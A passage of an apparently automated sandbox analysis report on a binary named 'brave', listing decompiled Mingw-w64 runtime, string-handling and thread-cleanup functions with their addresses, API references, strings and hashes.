				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed long long _t55;
				long long _t59;
				intOrPtr _t64;
				struct _MEMORY_BASIC_INFORMATION* _t67;
				intOrPtr _t76;
				long long _t80;

				_t26 = __ebx;
				_t44 =  &_a16;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_v32 = _t44;
				_t20 = E00007FF77FF715BB1D50(_t19, 2, _t44, __rcx);
				r8d = 0x1b;
				0x15bb16c8(_t51);
				_t52 = _v32;
				E00007FF77FF715BB1D50(_t20, 2, _t44, "Mingw-w64 runtime failure:\n");
				_t59 = _t44;
				0x15bb1648();
				0x15bb1710();
				asm("o16 nop [eax+eax]");
				_t80 = _t59;
				if (_t26 <= 0) goto 0x15b9e7f0;
				_t45 =  *0x15e510f8; // 0xab929ff6b0
				_t46 = _t45 + 0x18;
				asm("o16 nop [eax+eax]");
				_t64 =  *_t46;
				if (_t64 - _t80 > 0) goto 0x15b9e70c;
				_t76 =  *((intOrPtr*)(_t46 + 8));
				r8d =  *((intOrPtr*)(_t76 + 8));
				if (_t80 - _t64 + _t76 < 0) goto 0x15b9e793;
				_t47 = _t46 + 0x28;
				if (1 != _t26) goto 0x15b9e6f0;
				_t22 = E00007FF77FF715B9F3C0();
				if (_t47 == 0) goto 0x15b9e812;
				_t48 =  *0x15e510f8; // 0xab929ff6b0
				_t55 =  *0x15e510f4 +  *0x15e510f4 * 4 << 3;
				_t49 = _t48 + _t55;
				 *((long long*)(_t49 + 0x20)) = _t47;
				 *_t49 = 0;
				E00007FF77FF715B9F4F0(_t22, _t76);
				r8d = 0x30;
				_t50 =  *0x15e510f8; // 0xab929ff6b0
				 *((long long*)(_t50 + _t55 + 0x18)) = _t80 + _t49;
				VirtualQuery(_t52, _t67, __rcx);
				_t42 = _t50;
				if (_t42 == 0) goto 0x15b9e7f7;
				if (_t42 == 0) goto 0x15b9e78c;
				if (_t42 != 0) goto 0x15b9e7a0;
				 *0x15e510f4 =  *0x15e510f4 + 1;
				return _v108;
			}

0x7ff715b9e650
0x7ff715b9e65a
0x7ff715b9e664
0x7ff715b9e669
0x7ff715b9e66e
0x7ff715b9e673
0x7ff715b9e678
0x7ff715b9e67d
0x7ff715b9e692
0x7ff715b9e697
0x7ff715b9e6a1
0x7ff715b9e6a9
0x7ff715b9e6af
0x7ff715b9e6b4
0x7ff715b9e6ba
0x7ff715b9e6cf
0x7ff715b9e6d4
0x7ff715b9e6da
0x7ff715b9e6e3
0x7ff715b9e6e7
0x7ff715b9e6f0
0x7ff715b9e6f6
0x7ff715b9e6f8
0x7ff715b9e6fc
0x7ff715b9e706
0x7ff715b9e70f
0x7ff715b9e715
0x7ff715b9e71a
0x7ff715b9e725
0x7ff715b9e72b
0x7ff715b9e736
0x7ff715b9e73a
0x7ff715b9e73d
0x7ff715b9e741
0x7ff715b9e747
0x7ff715b9e754
0x7ff715b9e75d
0x7ff715b9e764
0x7ff715b9e769
0x7ff715b9e76f
0x7ff715b9e772
0x7ff715b9e782
0x7ff715b9e78a
0x7ff715b9e78c
0x7ff715b9e79b

APIs

VirtualQuery.KERNEL32 ref: 00007FF715B9E769

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF715B9E801
VirtualProtect failed with code 0x%x, xrefs: 00007FF715B9E7DE
Address %p has no image-section, xrefs: 00007FF715B9E6C0, 00007FF715B9E815
Mingw-w64 runtime failure:, xrefs: 00007FF715B9E688

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 132a4c11c153de298ffea9ed1bdabd017d4d66a2df506e748bccd0aa60d22546
Instruction ID: a30018b1ce5d4aea8299956e0058ee8f7a051140c603d610142856043525a63a
Opcode Fuzzy Hash: 132a4c11c153de298ffea9ed1bdabd017d4d66a2df506e748bccd0aa60d22546
Instruction Fuzzy Hash: C751B176E15E8285EA28AF11E8416AAB760FB45FA4F844035EE4C07364EF3CE54DC710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BACD30 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122COMMON

Download Yara Rule

Strings

%-*.*s, xrefs: 00007FF715BACEC6
%.*s, xrefs: 00007FF715BACEB8
%*.*s, xrefs: 00007FF715BACE75

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s
API String ID: 0-4054516066
Opcode ID: 3b4b1a4249cd6db309c4553ff8de0bac3b9e23fda156ad8bb14e5570f57846da
Instruction ID: 567b088d42fdf376948e1f439f914539d4865e5cfc0c131957e092f4f787bf4d
Opcode Fuzzy Hash: 3b4b1a4249cd6db309c4553ff8de0bac3b9e23fda156ad8bb14e5570f57846da
Instruction Fuzzy Hash: 9C519CB2E14A4286E775AF35C141779B7E1DB44FB4F948131EA4C4B6A5CB3CF8048754

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BAC900 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00007FF77FF715BAC900(void* __edx, void* __rax, void* __rcx, void* __r8) {
				signed int _v72;
				char _v80;
				intOrPtr _t19;
				intOrPtr _t28;
				void* _t40;
				void* _t48;
				void* _t52;
				void* _t53;
				char* _t62;

				_t52 = __rax;
				_t19 =  *((intOrPtr*)(__r8 + 0x10));
				_t53 = __r8;
				if (_t19 < 0) goto 0x15bac91f;
				_t40 =  >  ? _t19 : __edx;
				r8d =  *((intOrPtr*)(__r8 + 0xc));
				if (( *(__r8 + 8) & 0x00006000) == 0x6000) goto 0x15baca28;
				if (_t40 - r8d < 0) goto 0x15bac9c0;
				 *((intOrPtr*)(__r8 + 0xc)) = 0xffffffff;
				if (_t40 > 0) goto 0x15bac97b;
				goto 0x15baca0d;
				_t62 = __rcx + __rax;
				E00007FF77FF715BAC8A0(_v72 & 0xffff, __r8);
				if (_t40 == 0) goto 0x15baca0d;
				_v80 = 0;
				strlen(??);
				E00007FF77FF715BB1940( &_v72, _t62, _t52,  &_v80);
				_t48 = _t52;
				if (_t48 == 0) goto 0x15baca0d;
				if (_t48 >= 0) goto 0x15bac960;
				_v72 =  *_t62;
				goto 0x15bac965;
				asm("o16 nop [cs:eax+eax]");
				r8d = r8d - _t40 - 1;
				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
				if (0 != 0) goto 0x15bac94a;
				r8d = r8d - 1;
				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
				E00007FF77FF715BAC8A0(0x20, _t53);
				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
				if ( *((intOrPtr*)(_t53 + 0xc)) != 0) goto 0x15bac9e0;
				goto 0x15bac94a;
				E00007FF77FF715BAC8A0(0x20, _t53);
				_t28 =  *((intOrPtr*)(_t53 + 0xc));
				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
				if (_t28 > 0) goto 0x15baca00;
				return _t28;
			}

0x7ff715bac900
0x7ff715bac90a
0x7ff715bac913
0x7ff715bac918
0x7ff715bac91c
0x7ff715bac922
0x7ff715bac934
0x7ff715bac93d
0x7ff715bac943
0x7ff715bac956
0x7ff715bac958
0x7ff715bac96b
0x7ff715bac96e
0x7ff715bac975
0x7ff715bac97e
0x7ff715bac989
0x7ff715bac99a
0x7ff715bac99f
0x7ff715bac9a2
0x7ff715bac9a4
0x7ff715bac9af
0x7ff715bac9b4
0x7ff715bac9b6
0x7ff715bac9c0
0x7ff715bac9c3
0x7ff715bac9ca
0x7ff715bac9d0
0x7ff715bac9d4
0x7ff715bac9e8
0x7ff715bac9f3
0x7ff715bac9f8
0x7ff715bac9fa
0x7ff715baca08
0x7ff715baca0d
0x7ff715baca13
0x7ff715baca18
0x7ff715baca24

Strings

%*.*S, xrefs: 00007FF715BACA3D
%.*S, xrefs: 00007FF715BACA68
%-*.*S, xrefs: 00007FF715BACA76

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %*.*S$%-*.*S$%.*S
API String ID: 0-2115465065
Opcode ID: 7168d2604b3189bc1086008fb78c7252569c5abbf682eefe2c3ff4568daf00a2
Instruction ID: fd319b9716a8aa3d78bcd1ef96cbd293c123581ccbb029fc65120f39c94bc1b1
Opcode Fuzzy Hash: 7168d2604b3189bc1086008fb78c7252569c5abbf682eefe2c3ff4568daf00a2
Instruction Fuzzy Hash: 2741C673F18A4246E776AA25D400679E290AB84FB4F98C131EE4D476E9DF3CE5498B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB45C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 215stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF715BB45E9
memcmp.MSVCRT ref: 00007FF715BB4608
memcmp.MSVCRT ref: 00007FF715BB4696
memcmp.MSVCRT ref: 00007FF715BB4718

Part of subcall function 00007FF715BC1250: strlen.MSVCRT ref: 00007FF715BC126E

memcmp.MSVCRT ref: 00007FF715BB47C4

Strings

basic_string::compare, xrefs: 00007FF715BB4642, 00007FF715BB46CC, 00007FF715BB474E, 00007FF715BB47FA, 00007FF715BB4813
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BB4649, 00007FF715BB46D3, 00007FF715BB4755, 00007FF715BB4801, 00007FF715BB481A

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 68f9f2bcd5ab65c1f543f9db557d2865906ff8277c6dcd0d61bc8145445e6c47
Instruction ID: e6d2883576c5e2eb6989d37b8822536b064804284d4391becaecb3ef6992173a
Opcode Fuzzy Hash: 68f9f2bcd5ab65c1f543f9db557d2865906ff8277c6dcd0d61bc8145445e6c47
Instruction Fuzzy Hash: A851D762F14D8241EE38AA26DD402F59242AF05FF4FD84631DE2D97BF1EE5CDA89C214

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BB5670 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 202stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF715BB5699
memcmp.MSVCRT ref: 00007FF715BB56BA
memcmp.MSVCRT ref: 00007FF715BB5746
memcmp.MSVCRT ref: 00007FF715BB57C5

Part of subcall function 00007FF715BC1250: strlen.MSVCRT ref: 00007FF715BC126E

memcmp.MSVCRT ref: 00007FF715BB5861

Strings

basic_string::compare, xrefs: 00007FF715BB56F4, 00007FF715BB577C, 00007FF715BB57FB, 00007FF715BB5897, 00007FF715BB58B0
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BB56FB, 00007FF715BB5783, 00007FF715BB5802, 00007FF715BB589E, 00007FF715BB58B7

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 59c97ae42c308dfeb0f959f2ed3afa6849da74c1a26816688b8ea568bade8b86
Instruction ID: 74852e005fa84856e4c1ae52b0bafc478b4950599b9cb2b3a2d569b73c512f17
Opcode Fuzzy Hash: 59c97ae42c308dfeb0f959f2ed3afa6849da74c1a26816688b8ea568bade8b86
Instruction Fuzzy Hash: 6B518662F15D8681EE38AA26DD402E593809F05FF0F9C4232DE2D577F5EF5CDA8A8214

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBD5D0 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BBD5D0(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
				signed int _t6;
				long long _t15;
				long long _t17;
				signed char* _t18;

				_t17 =  *((intOrPtr*)(__rdx + 8));
				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				_t18 =  *((intOrPtr*)(__rdx));
				if (__eflags == 0) goto 0x15bbd5f6;
				if (_t18 == 0) goto 0x15bbd662;
				if (_t17 - 0xf > 0) goto 0x15bbd630;
				if (_t17 != 1) goto 0x15bbd620;
				_t6 =  *_t18 & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = _t17;
				 *((char*)(_t15 + _t17)) = 0;
				return _t6;
			}

0x7ff715bbd5d8
0x7ff715bbd5df
0x7ff715bbd5e3
0x7ff715bbd5e6
0x7ff715bbd5ef
0x7ff715bbd5f4
0x7ff715bbd5fa
0x7ff715bbd600
0x7ff715bbd602
0x7ff715bbd607
0x7ff715bbd60a
0x7ff715bbd60e
0x7ff715bbd61a

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF715BBD662
string::string, xrefs: 00007FF715BBD7E8
basic_string::_M_create, xrefs: 00007FF715BBD66E, 00007FF715BBD702
basic_string::basic_string, xrefs: 00007FF715BBD73E, 00007FF715BBD798
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BBD745, 00007FF715BBD79F, 00007FF715BBD7EF

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: 57c91d0e2d534c20ff1c2b42a6d8babaaafc64c8f69f6f4f5bb2339d47d93c0b
Instruction ID: 383b59b593cba41bec198e1d2647402b37f8bb3f26ad4bc39ca6da737965e6d3
Opcode Fuzzy Hash: 57c91d0e2d534c20ff1c2b42a6d8babaaafc64c8f69f6f4f5bb2339d47d93c0b
Instruction Fuzzy Hash: 0251E472E05F4588EB38BF25D4402A8A364FB18FA4BD44632CA6D477A1EF7CD65AC314

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BBD020 Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BBD020(void* __eflags, long long* __rcx, intOrPtr* __rdx) {
				signed int _t6;
				long long _t15;
				long long _t17;
				signed char* _t18;

				_t17 =  *((intOrPtr*)(__rdx + 8));
				_t15 = __rcx + 0x10;
				 *__rcx = _t15;
				_t18 =  *((intOrPtr*)(__rdx));
				if (__eflags == 0) goto 0x15bbd046;
				if (_t18 == 0) goto 0x15bbd0b2;
				if (_t17 - 0xf > 0) goto 0x15bbd080;
				if (_t17 != 1) goto 0x15bbd070;
				_t6 =  *_t18 & 0x000000ff;
				 *(__rcx + 0x10) = _t6;
				 *((long long*)(__rcx + 8)) = _t17;
				 *((char*)(_t15 + _t17)) = 0;
				return _t6;
			}

0x7ff715bbd028
0x7ff715bbd02f
0x7ff715bbd033
0x7ff715bbd036
0x7ff715bbd03f
0x7ff715bbd044
0x7ff715bbd04a
0x7ff715bbd050
0x7ff715bbd052
0x7ff715bbd057
0x7ff715bbd05a
0x7ff715bbd05e
0x7ff715bbd06a

Strings

basic_string::_M_construct null not valid, xrefs: 00007FF715BBD0B2
string::string, xrefs: 00007FF715BBD238
basic_string::_M_create, xrefs: 00007FF715BBD0BE, 00007FF715BBD152
basic_string::basic_string, xrefs: 00007FF715BBD18E, 00007FF715BBD1E8
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF715BBD195, 00007FF715BBD1EF, 00007FF715BBD23F

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_construct null not valid$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 0-4165567116
Opcode ID: e3e8cbf4f69290a6b3de281f3e3b3e56b2d6e49d707012ad7580e136db3a3009
Instruction ID: 8d7f701999b53e0e9b5145845f48a1595fb9034629e7df223d72440217fc0b1c
Opcode Fuzzy Hash: e3e8cbf4f69290a6b3de281f3e3b3e56b2d6e49d707012ad7580e136db3a3009
Instruction Fuzzy Hash: A051F472E09F4588EB38BB21D4501A8B364FB18FA4BD44632CA6D077A0DF7CD65AC315

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA5560 Relevance: 10.6, APIs: 7, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00007FF77FF715BA5560(void* __ecx, void* __rax, long long __rcx, void* __rdx, void* __r12, void* __r13) {
				int _t39;
				int _t42;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t91;
				intOrPtr _t93;
				long _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				long long _t120;

				_t81 = __rax;
				_t120 = __rcx;
				E00007FF77FF715BA2D40(__ecx, __rdx);
				 *((long long*)(_t81 + 8)) = _t120;
				if ( *((intOrPtr*)(_t81 + 0x1d8)) == 0) goto 0x15ba5589;
				E00007FF77FF715BA3280(_t81,  *((intOrPtr*)(_t81 + 0x1d8)));
				if (( *(_t81 + 0x40) & 0x00000030) == 0) goto 0x15ba5628;
				_t97 =  *0x15e46920; // 0x7ff715e51400
				_t82 =  *_t97;
				if (_t82 == 0) goto 0x15ba5609;
				if ( *((long long*)(_t82 + 0x30)) != 0) goto 0x15ba5622;
				 *((long long*)( *_t97 + 0x30)) = 0x15e42bd8;
				TlsGetValue(_t95);
				if (0x15e42bd8 == 0) goto 0x15ba5600;
				if ( *0x7FF715E42C00 == 0) goto 0x15ba563a;
				 *0x7FF715E42C94 = 1;
				r13d =  *0x7FF715E42BE0;
				if ( *((intOrPtr*)(0x7ff715e42c08)) == 0) goto 0x15ba55eb;
				CloseHandle(__r12);
				 *((long long*)(0x7ff715e42c08)) = 0;
				if (( *0x7FF715E42C1C & 0x00000004) != 0) goto 0x15ba568d;
				__imp___endthreadex();
				E00007FF77FF715BA7060();
				if ( *((long long*)(0x7ff715e42c08)) == 0) goto 0x15ba55a9;
				_t84 =  *_t97;
				if (_t84 != 0) goto 0x15ba5622;
				E00007FF77FF715BA7060();
				goto 0x15ba55b7;
				_t18 = _t97 + 0xd0; // 0xd0
				__imp__longjmp();
				 *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x30)))) = 0xdeadbeef;
				if (_t18 == 0) goto 0x15ba564b;
				_t39 = CloseHandle(__r13);
				 *((long long*)(0x7ff715e42c08)) = 0;
				r13d =  *((intOrPtr*)(0x7ff715e42be0));
				E00007FF77FF715BA2D20(_t39, 0x15e42bd8);
				_t86 =  *_t97;
				if (_t86 == 0) goto 0x15ba56d6;
				if ( *((long long*)(_t86 + 0x30)) != 0) goto 0x15ba56c0;
				 *((long long*)(_t86 + 0x30)) = 0x15e42bd8;
				TlsSetValue(??, ??);
				goto 0x15ba5600;
				 *0x15e42bd8 = 0xdeadbeef;
				_t42 = CloseHandle(??);
				 *((long long*)(0x7ff715e42c00)) = 0;
				E00007FF77FF715BA2D20(_t42, 0x15e42bd8);
				_t88 =  *_t97;
				if (_t88 == 0) goto 0x15ba56f4;
				if ( *((long long*)(_t88 + 0x30)) == 0) goto 0x15ba56c6;
				goto 0x15ba567e;
				 *((long long*)( *_t97 + 0x30)) = 0x15e42bd8;
				goto 0x15ba567e;
				E00007FF77FF715BA7060();
				_t91 =  *_t97;
				if ( *((long long*)(0x7ff715e42c08)) == 0) goto 0x15ba5670;
				if (_t91 != 0) goto 0x15ba56c0;
				E00007FF77FF715BA7060();
				goto 0x15ba56c0;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t91 + 0x30)) == 0) goto 0x15ba56c6;
				goto 0x15ba56e8;
				asm("o16 nop [cs:eax+eax]");
				_push(_t97);
				_t98 =  *0x15e46920; // 0x7ff715e51400
				_t93 =  *_t98;
				if (_t93 == 0) goto 0x15ba5760;
				if ( *((long long*)(_t93 + 0x18)) != 0) goto 0x15ba5780;
				 *((long long*)(_t93 + 0x18)) = 0x15e513d0;
				if ( *0x15e513d0 == 0) goto 0x15ba5750;
				E00007FF77FF715BA2D40( *0x15e513d0, 0x15e513d0);
				if (0x15e513d0 == 0) goto 0x15ba5750;
				if ( *0x7FF715E513F0 <= 0) goto 0x15ba5790;
				return 0;
			}

0x7ff715ba5560
0x7ff715ba5569
0x7ff715ba556c
0x7ff715ba5578
0x7ff715ba5582
0x7ff715ba5584
0x7ff715ba558d
0x7ff715ba5593
0x7ff715ba559a
0x7ff715ba55a0
0x7ff715ba55a7
0x7ff715ba55b3
0x7ff715ba55b9
0x7ff715ba55c5
0x7ff715ba55d0
0x7ff715ba55d2
0x7ff715ba55dc
0x7ff715ba55e3
0x7ff715ba55e5
0x7ff715ba55eb
0x7ff715ba55fa
0x7ff715ba5603
0x7ff715ba5609
0x7ff715ba5613
0x7ff715ba5615
0x7ff715ba561b
0x7ff715ba561d
0x7ff715ba5626
0x7ff715ba5628
0x7ff715ba5634
